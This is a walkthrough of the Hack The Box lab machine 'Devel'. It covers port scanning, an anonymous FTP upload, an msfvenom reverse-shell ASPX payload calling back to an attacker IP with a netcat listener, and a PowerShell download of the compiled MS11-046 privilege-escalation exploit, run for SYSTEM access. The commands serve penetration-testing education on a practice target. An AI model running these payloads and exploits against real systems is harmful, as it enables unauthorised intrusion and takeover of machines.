Devel - Hack The Box (HTB) writeup w/o Metasploit

Hack The Box is online platform helps in learning penetration testing.

Devel is a retired box with difficulty level Easy.

Start with nmap

#nmap -sC -sV 10.10.10.5
  • -sC scan using default scripts against the target
  • -sV enumerated versions

Two ports open: 21 (ftp) and 80 (http)

Use nmap to scan all ports (0-65535)

#nmap -p- 10.10.10.5 | tee nmap nmap-all-ports.txt
  • -p- scan all ports
  • tee save it in the file and also gives standard output

nmap UDP scan

#nmap -sU 10.10.10.5 | tee nmap-udp.txt

No ports found in UDP scan

Check webpage as port 80 open

Anonymous login allowed on ftp. Try to upload test.html

Successfully upload test.html. This gives an idea of upload payload and gets a reverse shell.

msfvenom - tool to create reverse shell

List all modules for formats

#msfvenom -l formats

List all windows paylods.

#msfvenom --list payloads | grep windows

Create payload by using msfvenom

#msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.10.21 LPORT=1111 -o shell.aspx

Upload payload on server as anonymous login is allowed on ftp.

#put shell.aspx

Getting reverse shell

#nc -lvnp 1111

Get shell.

Try to access folder Administrator and babis, but access denied.

Privilege Escalation

#systeminfo

The operating system is Windows 7 Enterprise but no hotfix is installed. This gives an idea to execute any existing exploit. Search on it on google and found MS11-046. EDB-ID is 40564 and CVE 2011-1249.

#searchsploit -m 40564

Refer exploit notes to understand how to compile exploit code.

Compile by using below command:

#i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

Upload it on machine

#powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.21:2222/MS11-046.exe', 'C:\Users\Public\Downloads\MS11-046.exe')"

Run privilege escalation exploit

#MS11-046.exe

Get root

Subscribe us to receive more such articles updates in your email.

If you have any questions, feel free to ask in the comments section below. Nothing gives me greater joy than helping my readers!

Disclaimer: This tutorial is for educational purpose only. Individual is solely responsible for any illegal act.

You may also like...

Leave a Reply

Your email address will not be published.